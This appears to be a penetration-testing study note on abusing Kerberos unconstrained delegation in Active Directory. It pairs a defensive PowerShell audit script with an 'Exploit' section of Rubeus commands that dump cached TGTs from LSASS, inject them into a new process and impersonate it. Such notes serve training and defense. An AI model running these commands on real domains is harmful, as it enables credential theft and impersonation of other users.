Unconstrained Delegation

Unconstrained Delegation is a Kerberos delegation feature in Active Directory that allows a service to request a Service Ticket for any service on behalf of a user.

The "Trust this computer for delegation to any service (Kerberos only)" option must be enabled in the Delegation tab of the object's (usually the computer account's) properties.

Unconstrained Delegation properties [Image From CRTO]

When unconstrained delegation is enabled on a computer, the Key Distribution Center includes a copy of the user's Ticket Granting Ticket inside the Service Ticket. When the user authenticates to the target service with that Service Ticket, the Ticket Granting Ticket is cached in memory (LSASS) on the computer hosting the service for future delegation use.

The goal is to identify and gain access to machines allowing unconstrained delegation in order to extract cached Ticket Granting Tickets that can be used to request a Service Ticket for any other service on behalf of the user.

Enumeration
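
The flag that the GUI option above sets is the TRUSTED_FOR_DELEGATION bit (0x80000) of userAccountControl, so it can be audited with a single LDAP query. The script below is an added example, not part of the original notes: it lists every computer and user account in the domain with that bit set using plain ADSI (no RSAT module needed) and separates domain controllers, which carry the flag by design, from the accounts a defender should review. The default search base and page size are assumptions.

```powershell
# Added audit script (not from the original notes): lists AD accounts with the
# TRUSTED_FOR_DELEGATION flag (unconstrained delegation) via ADSI.
# Assumes it runs on a domain-joined host; a normal domain user's LDAP read is enough.

$TRUSTED_FOR_DELEGATION = 0x80000   # userAccountControl bit set by the Delegation tab option
$SERVER_TRUST_ACCOUNT   = 0x2000    # set on domain controller computer accounts
$BitAnd = '1.2.840.113556.1.4.803'  # LDAP extensible matching rule: bitwise AND

function Get-UnconstrainedDelegationAccounts {
    [CmdletBinding()]
    param(
        # Default: the domain naming context of the DC we are joined to (assumption)
        [string]$SearchBase = [string]([ADSI]'LDAP://RootDSE').defaultNamingContext
    )

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://$SearchBase"
    $searcher.PageSize   = 1000   # paging avoids the 1000-result LDAP cap
    # Computers and user/service accounts with the unconstrained delegation bit set
    $searcher.Filter = "(&(|(objectCategory=computer)(objectCategory=person))" +
                       "(userAccountControl:${BitAnd}:=$TRUSTED_FOR_DELEGATION))"
    foreach ($attr in 'sAMAccountName', 'dNSHostName', 'userAccountControl') {
        [void]$searcher.PropertiesToLoad.Add($attr)
    }

    foreach ($result in $searcher.FindAll()) {
        $uac  = [int]$result.Properties['useraccountcontrol'][0]
        $isDc = ($uac -band $SERVER_TRUST_ACCOUNT) -ne 0
        [PSCustomObject]@{
            Account            = $result.Properties['samaccountname'][0]
            Host               = $result.Properties['dnshostname'][0]
            IsDomainController = $isDc
            # DCs need this flag; any other account is a finding to review
            Finding            = if ($isDc) { 'Expected (DC)' }
                                 else { 'Review: remove or convert to constrained delegation' }
        }
    }
}

# Usage: show only the non-DC accounts, i.e. the ones worth reviewing
Get-UnconstrainedDelegationAccounts |
    Where-Object { -not $_.IsDomainController } |
    Format-Table -AutoSize
```

Any non-DC host that appears here caches the TGT of every user who authenticates to it, which is exactly the exposure the rest of this page walks through.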

Exploit

Windows (Target)
## Show Cached Tickets
Rubeus.exe triage

## Extract The TGT Using Its LUID (/nowrap To Make It Copy Friendly)
Rubeus.exe dump /luid:0x14794e /nowrap

## Create A Process And Inject The Dumped TGT
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:AnyPassword /ticket:[tgt]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

You must have elevated privileges on the target computer in order to dump TGTs from LSASS.